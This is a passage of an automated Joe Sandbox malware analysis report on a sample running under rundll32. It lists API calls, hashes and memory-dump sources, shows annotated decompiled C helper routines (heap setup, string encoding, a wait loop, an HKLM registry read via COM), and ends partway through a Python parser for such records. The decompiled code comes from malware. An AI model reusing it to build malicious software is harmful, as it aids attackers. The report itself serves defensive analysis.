                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(0629A400), ref: 0628E873
                                                          • RtlLeaveCriticalSection.NTDLL(0629A400), ref: 0628E8AF
                                                            • Part of subcall function 06271A0A: lstrlen.KERNEL32(?,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977,0628893A,?,?), ref: 06271A58
                                                            • Part of subcall function 06271A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271A6A
                                                            • Part of subcall function 06271A0A: lstrcpy.KERNEL32(00000000,?), ref: 06271A79
                                                            • Part of subcall function 06271A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,062919C5,062994D8,?,?,00000004,00000000,?,00000000,06290977), ref: 06271A8A
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 1872894792-0
                                                          • Opcode ID: 4ec4cf9f11c583a9490a3d266f01a5986ef1a36c6b9f3eb709cd3509d074334e
                                                          • Instruction ID: e68ca16d1424e3cc977b645fa9b3742901a274ae0cc7200b75939904e7d3b44d
                                                          • Opcode Fuzzy Hash: 4ec4cf9f11c583a9490a3d266f01a5986ef1a36c6b9f3eb709cd3509d074334e
                                                          • Instruction Fuzzy Hash: 83F05C313323128F87A03F18AC8C869F758EFC8155302026AED6253300CA319C01CAF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0629A05C), ref: 0627C9BE
                                                            • Part of subcall function 06282331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0628235C
                                                            • Part of subcall function 06282331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 06282369
                                                            • Part of subcall function 06282331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 062823F5
                                                            • Part of subcall function 06282331: GetModuleHandleA.KERNEL32(00000000), ref: 06282400
                                                            • Part of subcall function 06282331: RtlImageNtHeader.NTDLL(00000000), ref: 06282409
                                                            • Part of subcall function 06282331: RtlExitUserThread.NTDLL(00000000), ref: 0628241E
                                                          • InterlockedDecrement.KERNEL32(0629A05C), ref: 0627C9E2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                                                          • String ID:
                                                          • API String ID: 1011034841-0
                                                          • Opcode ID: 69bbdeb9aa7239f3870e82aa17f776bf902f9b5e7f07ae9cd5c04519a6c6eaa2
                                                          • Instruction ID: b1fa0e1a9c27ec10ca87ed6372885e076e7f9df08f227eb510b502102ed6ccd6
                                                          • Opcode Fuzzy Hash: 69bbdeb9aa7239f3870e82aa17f776bf902f9b5e7f07ae9cd5c04519a6c6eaa2
                                                          • Instruction Fuzzy Hash: 1FE01232778223DFDFE26A759C58F7E6651ABA5688F048614FD85F0050C630C450D6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D1CD6(signed int __edx, intOrPtr _a4) {
                                                          				void* _t3;
                                                          				void* _t5;
                                                          				void* _t7;
                                                          				void* _t8;
                                                          				void* _t9;
                                                          				signed int _t10;
                                                          
                                                          				_t10 = __edx;
                                                          				_t3 = HeapCreate(0, 0x400000, 0); // executed
                                                          				 *0x36da2d8 = _t3;
                                                          				if(_t3 == 0) {
                                                          					_t8 = 8;
                                                          					return _t8;
                                                          				}
                                                          				 *0x36da1c8 = GetTickCount();
                                                          				_t5 = E036D6D78(_a4);
                                                          				if(_t5 == 0) {
                                                          					_t5 = E036D4B89(_t9, _a4); // executed
                                                          					if(_t5 == 0) {
                                                          						if(E036D6B1C(_t9) != 0) {
                                                          							 *0x36da300 = 1; // executed
                                                          						}
                                                          						_t7 = E036D3D2C(_t10); // executed
                                                          						return _t7;
                                                          					}
                                                          				}
                                                          				return _t5;
                                                          			}

                                                          0x036d1cd6
                                                          0x036d1cdf
                                                          0x036d1ce5
                                                          0x036d1cec
                                                          0x036d1cf0
                                                          0x00000000
                                                          0x036d1cf0
                                                          0x036d1cfd
                                                          0x036d1d02
                                                          0x036d1d09
                                                          0x036d1d0f
                                                          0x036d1d16
                                                          0x036d1d1f
                                                          0x036d1d21
                                                          0x036d1d21
                                                          0x036d1d2b
                                                          0x00000000
                                                          0x036d1d2b
                                                          0x036d1d16
                                                          0x036d1d30

                                                          APIs
                                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,036D5E54,?), ref: 036D1CDF
                                                          • GetTickCount.KERNEL32 ref: 036D1CF3
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: CountCreateHeapTick
                                                          • String ID:
                                                          • API String ID: 2177101570-0
                                                          • Opcode ID: bf9bc9f01fce2010c5e797fe2d067f7150969ab6df7b509527a540a8e167ebd3
                                                          • Instruction ID: b0232a1c181c4372f104b60af2959880883e07084e6219997fa3c1e579e779df
                                                          • Opcode Fuzzy Hash: bf9bc9f01fce2010c5e797fe2d067f7150969ab6df7b509527a540a8e167ebd3
                                                          • Instruction Fuzzy Hash: 22F09B74E05302AADB60FBF1FE0571575F46F01744F145429E901D428CDBF5C4219629
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 062855E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0628561D
                                                            • Part of subcall function 062855E4: VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 06285653
                                                            • Part of subcall function 062855E4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 0628565F
                                                            • Part of subcall function 062855E4: lstrcmpi.KERNEL32(?,00000000), ref: 0628569C
                                                            • Part of subcall function 062855E4: StrChrA.SHLWAPI(?,0000002E), ref: 062856A5
                                                            • Part of subcall function 062855E4: lstrcmpi.KERNEL32(?,00000000), ref: 062856B7
                                                            • Part of subcall function 062855E4: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 06285708
                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00000010,?,?,?,062960E0,0000002C,062890D3,06898E36,?,00000000,0628A484), ref: 06291E2C
                                                            • Part of subcall function 0628A806: GetProcAddress.KERNEL32(?,00000000), ref: 0628A82F
                                                            • Part of subcall function 0628A806: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,06286230,00000000,00000000,00000028,00000100), ref: 0628A851
                                                          • VirtualFree.KERNELBASE(?,00000000,00008000,00000010,?,?,?,062960E0,0000002C,062890D3,06898E36,?,00000000,0628A484,?,00000318), ref: 06291EB7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Virtual$AllocFree$lstrcmpi$AddressMemory64ProcReadWow64
                                                          • String ID:
                                                          • API String ID: 4138075514-0
                                                          • Opcode ID: 636a9753d89b5bb81c730d5409ca32e26c82a94ec3743070ab17f65b8bec7810
                                                          • Instruction ID: 075080f48d2ef6d67606ddffd6c14b7930cac4dd4d8d9a570d6f3219c8367c21
                                                          • Opcode Fuzzy Hash: 636a9753d89b5bb81c730d5409ca32e26c82a94ec3743070ab17f65b8bec7810
                                                          • Instruction Fuzzy Hash: 2721D571D1122AEFCF91DFA6DC84ADEBBB5BF48720F10812AE924B6250C3344951CFA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,00000000,?,00000000,06290977,0628893A,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 062918D5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID:
                                                          • API String ID: 4139908857-0
                                                          • Opcode ID: 1a0b23f3cec8831fc473482efbc97473b5447ffa8249c9ed164b5160c104228a
                                                          • Instruction ID: 6c478c509f745692c5e2e294a8f9eb32900ac6b8d89cec0ab0884352b10a8f9e
                                                          • Opcode Fuzzy Hash: 1a0b23f3cec8831fc473482efbc97473b5447ffa8249c9ed164b5160c104228a
                                                          • Instruction Fuzzy Hash: AC318275E20206EFEF81DF99D8889ADB7B5FBC5220B548469DB14AB250C730A950CFB1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 92%
                                                          			E036D1C03(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
                                                          				signed int _v5;
                                                          				signed int _v12;
                                                          				void* _t32;
                                                          				signed int _t37;
                                                          				signed int _t39;
                                                          				signed char _t45;
                                                          				void* _t49;
                                                          				char* _t51;
                                                          				signed int _t65;
                                                          				signed int _t66;
                                                          				signed int _t69;
                                                          
                                                          				_v12 = _v12 & 0x00000000;
                                                          				_t69 = __eax;
                                                          				_t32 = RtlAllocateHeap( *0x36da2d8, 0, __eax << 2); // executed
                                                          				_t49 = _t32;
                                                          				if(_t49 == 0) {
                                                          					_v12 = 8;
                                                          				} else {
                                                          					 *_a8 = _t49;
                                                          					do {
                                                          						_t45 =  *_a4;
                                                          						asm("cdq");
                                                          						_t65 = 0x64;
                                                          						_t37 = (_t45 & 0x000000ff) / _t65;
                                                          						_v5 = _t37;
                                                          						if(_t37 != 0) {
                                                          							 *_t49 = _t37 + 0x30;
                                                          							_t49 = _t49 + 1;
                                                          							_t45 = _t45 + _t37 * 0x9c;
                                                          						}
                                                          						asm("cdq");
                                                          						_t66 = 0xa;
                                                          						_t39 = (_t45 & 0x000000ff) / _t66;
                                                          						if(_t39 != 0 || _v5 != _t39) {
                                                          							 *_t49 = _t39 + 0x30;
                                                          							_t49 = _t49 + 1;
                                                          							_t45 = _t45 + _t39 * 0xf6;
                                                          						}
                                                          						_a4 = _a4 + 1;
                                                          						 *_t49 = _t45 + 0x30;
                                                          						 *(_t49 + 1) = 0x2c;
                                                          						_t49 = _t49 + 2;
                                                          						_t69 = _t69 - 1;
                                                          					} while (_t69 != 0);
                                                          					_t51 = _t49 - 1;
                                                          					 *_a12 = _t51 -  *_a8;
                                                          					 *_t51 = 0;
                                                          				}
                                                          				return _v12;
                                                          			}

                                                          0x036d1c08
                                                          0x036d1c0d
                                                          0x036d1c1b
                                                          0x036d1c21
                                                          0x036d1c25
                                                          0x036d1c96
                                                          0x036d1c27
                                                          0x036d1c2b
                                                          0x036d1c2e
                                                          0x036d1c31
                                                          0x036d1c38
                                                          0x036d1c39
                                                          0x036d1c3a
                                                          0x036d1c3c
                                                          0x036d1c41
                                                          0x036d1c48
                                                          0x036d1c4e
                                                          0x036d1c4f
                                                          0x036d1c4f
                                                          0x036d1c56
                                                          0x036d1c57
                                                          0x036d1c58
                                                          0x036d1c5c
                                                          0x036d1c68
                                                          0x036d1c6e
                                                          0x036d1c6f
                                                          0x036d1c6f
                                                          0x036d1c71
                                                          0x036d1c77
                                                          0x036d1c79
                                                          0x036d1c7e
                                                          0x036d1c7f
                                                          0x036d1c7f
                                                          0x036d1c85
                                                          0x036d1c8e
                                                          0x036d1c90
                                                          0x036d1c93
                                                          0x036d1ca2

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 036D1C1B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: b4e0dc7c9a9d492bdef54caade07f8a91293275693739458c168231efc425806
                                                          • Instruction ID: ee43103cbd845a928f4e4ee4aab647aa58a770aab8031db505b7c2a633f17a2c
                                                          • Opcode Fuzzy Hash: b4e0dc7c9a9d492bdef54caade07f8a91293275693739458c168231efc425806
                                                          • Instruction Fuzzy Hash: 6E1129716853449FEB15CF29D852BE9BBA9DF53318F18508EE4409B392C2BB850BC760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,062999DC,-0000000C,?,?,?,0628C01A,00000006,?,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 06274ADA
                                                            • Part of subcall function 062774AE: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,0629A400), ref: 062774C5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleInformationModuleProcessQuery
                                                          • String ID:
                                                          • API String ID: 2776635927-0
                                                          • Opcode ID: cd304c51990325510a59fc19587624974d3a643c62f440f50f528dec7383a471
                                                          • Instruction ID: f14e687a160e2b1bda5ea7b2e5fe56619ee4ceda536f56e10db4d7bee224ec15
                                                          • Opcode Fuzzy Hash: cd304c51990325510a59fc19587624974d3a643c62f440f50f528dec7383a471
                                                          • Instruction Fuzzy Hash: 0021AE32E20206AFDBA0EF99C890E6E77E5EF48394768852DED458B150D670FD01DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E036D375F(signed int* __ecx, intOrPtr _a4, signed int* _a8, signed int* _a12) {
                                                          				intOrPtr _v12;
                                                          				signed int _v20;
                                                          				intOrPtr _v24;
                                                          				signed int _v60;
                                                          				char _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr _t14;
                                                          				signed int* _t16;
                                                          				signed int _t25;
                                                          				signed int _t26;
                                                          				signed int* _t28;
                                                          				signed int _t30;
                                                          				char* _t31; // declaration missing from decompiler output; holds &_v68 below
                                                          
                                                          				_t28 = __ecx;
                                                          				_t14 =  *0x36da368; // 0x5969618
                                                          				_v12 = _t14;
                                                          				_t16 = _a12;
                                                          				_t30 = 8;
                                                          				if(_t16 != 0) {
                                                          					 *_t16 =  *_t16 & 0x00000000;
                                                          				}
                                                          				do {
                                                          					_t31 =  &_v68;
                                                          					if(E036D227F( &_v68) == 0) {
                                                          						goto L16;
                                                          					}
                                                          					_t30 = E036D6954(_t31, _a4, _v12);
                                                          					if(_t30 == 0) {
                                                          						_t25 = E036D1CA5(_t31, _t28); // executed
                                                          						_t30 = _t25;
                                                          						if(_t30 != 0) {
                                                          							if(_t30 == 0x102) {
                                                          								E036DA000 = E036DA000 + 0xea60;
                                                          							}
                                                          						} else {
                                                          							if(_v24 != 0xc8) {
                                                          								_t30 = 0xe8;
                                                          							} else {
                                                          								_t26 = _v20;
                                                          								if(_t26 == 0) {
                                                          									_t30 = 0x10d2;
                                                          								} else {
                                                          									_t28 = _a8;
                                                          									if(_t28 != 0) {
                                                          										_v60 = _v60 & _t30;
                                                          										 *_t28 = _v60;
                                                          										_t28 = _a12;
                                                          										if(_t28 != 0) {
                                                          											 *_t28 = _t26;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          					E036D4274( &_v68, 0x102, _t28, _t30);
                                                          					L16:
                                                          				} while (_t30 == 0x2f19 && WaitForSingleObject( *0x36da30c, 0) == 0x102);
                                                          				return _t30;
                                                          			}
                                                          0x036d375f
                                                          0x036d3765
                                                          0x036d376c
                                                          0x036d3774
                                                          0x036d377a
                                                          0x036d377d
                                                          0x036d377f
                                                          0x036d377f
                                                          0x036d3787
                                                          0x036d3787
                                                          0x036d3791
                                                          0x00000000
                                                          0x00000000
                                                          0x036d37a0
                                                          0x036d37a4
                                                          0x036d37a8
                                                          0x036d37ad
                                                          0x036d37b1
                                                          0x036d37ed
                                                          0x036d37ef
                                                          0x036d37ef
                                                          0x036d37b3
                                                          0x036d37ba
                                                          0x036d37e4
                                                          0x036d37bc
                                                          0x036d37bc
                                                          0x036d37c1
                                                          0x036d37dd
                                                          0x036d37c3
                                                          0x036d37c3
                                                          0x036d37c8
                                                          0x036d37cd
                                                          0x036d37d0
                                                          0x036d37d2
                                                          0x036d37d7
                                                          0x036d37d9
                                                          0x036d37d9
                                                          0x036d37d7
                                                          0x036d37c8
                                                          0x036d37c1
                                                          0x036d37ba
                                                          0x036d37b1
                                                          0x036d37fc
                                                          0x036d3801
                                                          0x036d3801
                                                          0x036d3825

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,76CC81D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 036D3811
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 24740636-0
                                                          • Opcode ID: cff092893e6824a440529ffd6b5a0b48b66d512964bbb713b25f341a0d256057
                                                          • Instruction ID: 73703faded027dd1180f1bf0db5a3f5345bcf46100b6456899ad48ffca57c767
                                                          • Opcode Fuzzy Hash: cff092893e6824a440529ffd6b5a0b48b66d512964bbb713b25f341a0d256057
                                                          • Instruction Fuzzy Hash: A721C0BEF017459BDF11DE9AE984A6E77B5BB81350F28403AE501DB344DB70D801CB5A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 34%
			// Reads a registry string through a COM call and hands the caller a heap copy of it.
			// _a4/_a8/_a12 are forwarded to the subcall together with 0x80000002, the HKEY_LOCAL_MACHINE
			// constant; the result comes back as a VARIANT at _v20 and is accepted only when its
			// vt field is 8 (VT_BSTR). The OLEAUT32 calls make this look like a WMI/COM registry
			// query rather than a plain RegQueryValue (inference from the call shape, not from a symbol).
			// Return: 0 on success, 1 if the VARIANT is not a BSTR, the subcall's negative HRESULT
			// on failure, and 8 (the compared constant left in _t23) if the string copy fails.
			E036D1B6F(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;    // VARIANT.bstrVal: offset 8 of the 16-byte VARIANT that starts at _v20
				void* _v18;       // VARIANT.wReserved1..3 (offset 2)
				char _v20;        // VARIANT.vt (offset 0)
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;         // zero the VARIANT in place (what VariantInit would do)
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x36da348; // 0x228d5a8   -- module base used to reach embedded string constants
				_t4 = _t15 + 0x36db3a0; // 0x5968948
				_t20 = _t4;
				_t6 = _t15 + 0x36db124; // 0x650047
				_t17 = E036D46CB(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed; 0x80000002 == HKEY_LOCAL_MACHINE
				if(_t17 < 0) {
					_t23 = _t17;  // propagate the failing HRESULT
				} else {
					_t23 = 8;     // VT_BSTR
					if(_v20 != _t23) {
						_t23 = 1; // value came back with an unexpected VARIANT type
					} else {
						_t19 = E036D59AE(_t20, _v12);   // lstrlenW + memcpy + memset: heap copy of the BSTR
						if(_t19 != 0) {
							 *_a16 = _t19;  // caller owns the copy
							_t23 = 0;
						}
						__imp__#6(_v12);    // OLEAUT32 ordinal 6 == SysFreeString(bstrVal); matches the ref at 036D1BD2 below
					}
				}
				return _t23;
			}

Instruction addresses of E036D1B6F, one per decompiled statement (their alignment with the C-code lines was lost in extraction): 0x036d1b79 to 0x036d1be6.


                                                          APIs
                                                            • Part of subcall function 036D46CB: SysFreeString.OLEAUT32(?), ref: 036D47AA
                                                            • Part of subcall function 036D59AE: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,036D5EFA,004F0053,00000000,?), ref: 036D59B7
                                                            • Part of subcall function 036D59AE: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,036D5EFA,004F0053,00000000,?), ref: 036D59E1
                                                            • Part of subcall function 036D59AE: memset.NTDLL ref: 036D59F5
                                                          • SysFreeString.OLEAUT32(00000000), ref: 036D1BD2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: FreeString$lstrlenmemcpymemset
                                                          • String ID:
                                                          • API String ID: 397948122-0
                                                          • Opcode ID: ffed562d6e0bfe4551f53296b2f9e8ad8f4767dea0f647a070afec6427686086
                                                          • Instruction ID: 56676e3ee37f4478ebae2843a983228665c610088762b150855f729b01001a66
                                                          • Opcode Fuzzy Hash: ffed562d6e0bfe4551f53296b2f9e8ad8f4767dea0f647a070afec6427686086
                                                          • Instruction Fuzzy Hash: 18017C36900129BFDF51EFA9DD01DAABBB9FB49650F010569EA02E7160E7B09922C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
			// Validates its two inputs, then runs a transform-and-scan pair over the data.
			// 0x57 is ERROR_INVALID_PARAMETER. E036D1C03 (RtlAllocateHeap) is handed &_a4 and &_v8,
			// so by the call shape it replaces _a4 with a newly allocated buffer and reports its
			// size in _v8 (inference). E036D3B58 (lstrlen, StrStrA, RtlAllocateHeap) then searches
			// that buffer for a substring and fills the two output fields of the __esi context
			// (+8, +0xc) from its two input fields (+0, +4). The intermediate buffer is released
			// from the module's global heap, whose handle lives at 0x36da2d8.
			E036D2E4E(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;     // size of the buffer produced by E036D1C03 (inference)
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;   // status returned to the caller

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;   // ERROR_INVALID_PARAMETER
				} else {
					_t14 = E036D1C03(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed; _a4 is an in/out parameter here
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x36da348; // 0x228d5a8   -- module base, as in E036D1B6F
						_t9 = _t17 + 0x36dba40; // 0x444f4340   -- embedded string constant used as the search needle
						_t20 = E036D3B58( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x36da2d8, 0, _a4); // executed; free the buffer E036D1C03 allocated
					}
				}
				return _t26;
			}

Instruction addresses of E036D2E4E, one per decompiled statement (alignment with the C-code lines lost in extraction): 0x036d2e51 to 0x036d2eb3.


                                                          APIs
                                                            • Part of subcall function 036D1C03: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 036D1C1B
                                                            • Part of subcall function 036D3B58: lstrlen.KERNEL32(76CDF710,?,00000000,?,76CDF710), ref: 036D3B8C
                                                            • Part of subcall function 036D3B58: StrStrA.SHLWAPI(00000000,?), ref: 036D3B99
                                                            • Part of subcall function 036D3B58: RtlAllocateHeap.NTDLL(00000000,?), ref: 036D3BB8
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,036D553D), ref: 036D2EA4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
• Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Allocate$Freelstrlen
                                                          • String ID:
                                                          • API String ID: 2220322926-0
                                                          • Opcode ID: e38096258b4a2e84f9e9eda6f377e038ee023b7206f2c6e91ca693bf621a3615
                                                          • Instruction ID: f73ca88393e7da283a84a7b00f1ac2489cdd9238c755f63052bb72811a745f70
                                                          • Opcode Fuzzy Hash: e38096258b4a2e84f9e9eda6f377e038ee023b7206f2c6e91ca693bf621a3615
                                                          • Instruction Fuzzy Hash: F701A476500608FFCB21DF44DC00EAABBF9EB48340F144029FA05C7268E771EA55EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%
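The per-function records above (the "APIs" list with its "Part of subcall function" entries and the "Memory Dump Source" line) are regular enough to parse, which is how an analyst turns a listing like this into a capability summary or a hunt list without reading every record by hand. The Python below is an added example, not part of the Joe Sandbox report or its IDA plugin. The sample text is copied from the E036D2E4E and delay-load records on this page. Reading the fifth dotted field of the .sdmp name as the region's page protection is an assumption drawn from the values seen here (0x20, 0x04, 0x02 and 0x40 line up with the PAGE_* constants), not something the report documents; the record and function names are the editor's own.

```python
"""Parse Joe Sandbox decompilation records (APIs / Memory Dump Source) into triage data."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Assumption: the 5th dotted field of a .sdmp name is MEMORY_BASIC_INFORMATION.Protect.
# Inferred from the values on the page, not documented by the report format.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Function header of a C-Code block: "E036D2E4E(... ) {" (call sites inside the body lack the brace).
FUNC_RE = re.compile(r"^\s*(?P<name>E[0-9A-F]{8})\(.*\)\s*\{\s*$")
# "• Name.MODULE(args), ref: ADDR" and "• Part of subcall function XXXX: Name.MODULE(...), ref: ADDR".
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>[A-Za-z0-9_@#]+)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?.*?ref:\s*(?P<ref>[0-9A-F]+)")
SRC_RE = re.compile(r"Source File:\s*(?P<file>\S+\.sdmp),\s*Offset:\s*(?P<off>[0-9A-F]+)")


@dataclass
class Record:
    function: str
    quality: Optional[int] = None
    apis: List[Tuple[str, str, str]] = field(default_factory=list)        # (api, module, ref)
    subcalls: List[Tuple[str, str, str, str]] = field(default_factory=list)  # (callee, api, module, ref)
    source: Optional[str] = None
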